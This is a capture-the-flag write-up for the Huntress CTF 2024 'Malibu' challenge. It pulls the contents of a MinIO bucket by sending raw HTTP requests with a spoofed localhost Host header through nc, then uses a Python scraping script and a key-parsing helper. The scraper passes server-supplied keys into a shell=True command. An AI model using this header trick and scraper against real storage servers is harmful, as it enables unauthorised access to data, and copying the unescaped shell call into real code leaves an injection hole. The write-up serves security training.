Huntress CTF 2024 – Malibu

Server: MinIO

Get list of buckets

printf 'GET /bucket HTTP/1.1\r\nHost:127.0.0.1\r\n\r\n' | nc challenge.ctf.games 31877 -w 1

Save to file

printf 'GET /bucket HTTP/1.1\r\nHost:127.0.0.1\r\n\r\n' | nc challenge.ctf.games 31877 -w 1 > buckets.txt

Parse out the keys, make them comma-separated, then create a script to scrape all buckets and write the output to a txt file

Scrape.py

import subprocess

# Keys parsed out of buckets.txt
variables = ["comma", "separated", "keys"]

# Open a file to write the output
with open("output.txt", "w") as file:
    # Iterate over each variable and send the request
    for variable in variables:
        # printf emits the CRLF line endings no matter which shell runs the command
        command = f"printf 'GET /bucket/{variable} HTTP/1.1\\r\\nHost:127.0.0.1\\r\\n\\r\\n' | nc challenge.ctf.games 30580 -w 1"
        # Use subprocess to run the command
        process = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # Write the output to the file
        file.write(f"Request for /bucket/{variable}:\n")
        file.write(process.stdout.decode())  # Write the response from nc
        if process.stderr:
            file.write("Error: " + process.stderr.decode() + "\n")
        # Optional: Write a separator between different requests
        file.write("\n" + "=" * 40 + "\n\n")

Grep output.txt for the flag
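
The key-parsing step is not shown above. As an added example (not part of the original writeup), this pulls the <Key> values out of a raw response like the one saved in buckets.txt and percent-encodes each key before it goes into a request line. It assumes the listing is the S3-style ListBucketResult XML that MinIO serves; the sample response and the function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from urllib.parse import quote

# Constructed sample (assumed S3-style ListBucketResult), not data from the challenge.
SAMPLE_XML = (b'<?xml version="1.0" encoding="UTF-8"?>'
              b'<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'
              b'<Name>bucket</Name>'
              b'<Contents><Key>aaa/notes.txt</Key><Size>12</Size></Contents>'
              b'<Contents><Key>b c.bin</Key><Size>40</Size></Contents>'
              b'</ListBucketResult>')
# Raw response as nc would save it, here with a chunked body split in two.
SAMPLE = (b"HTTP/1.1 200 OK\r\nServer: MinIO\r\nTransfer-Encoding: chunked\r\n\r\n"
          + b"%x\r\n%b\r\n" % (60, SAMPLE_XML[:60])
          + b"%x\r\n%b\r\n" % (len(SAMPLE_XML) - 60, SAMPLE_XML[60:])
          + b"0\r\n\r\n")

def http_body(raw: bytes) -> bytes:
    """Strip status line and headers; undo chunked encoding if the server used it."""
    head, _, body = raw.partition(b"\r\n\r\n")
    if b"transfer-encoding: chunked" not in head.lower():
        return body
    out = b""
    while body:
        size_line, _, body = body.partition(b"\r\n")
        size = int(size_line.split(b";")[0].strip() or b"0", 16)  # chunk size is hex
        if size == 0:
            break
        out, body = out + body[:size], body[size + 2:]  # +2 skips the chunk's CRLF
    return out

def extract_keys(raw: bytes) -> list[str]:
    """Return every <Key> value, matching on the local tag name to ignore the namespace."""
    root = ET.fromstring(http_body(raw))
    return [el.text or "" for el in root.iter() if el.tag.rsplit("}", 1)[-1] == "Key"]

def request_line(key: str) -> str:
    """Keys are server-controlled text: percent-encode so spaces, quotes or CR/LF
    in a key cannot change the request (or a shell command built from it)."""
    return f"GET /bucket/{quote(key, safe='/')} HTTP/1.1\r\nHost:127.0.0.1\r\n\r\n"

if __name__ == "__main__":
    for key in extract_keys(SAMPLE):
        print(repr(request_line(key)))
```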
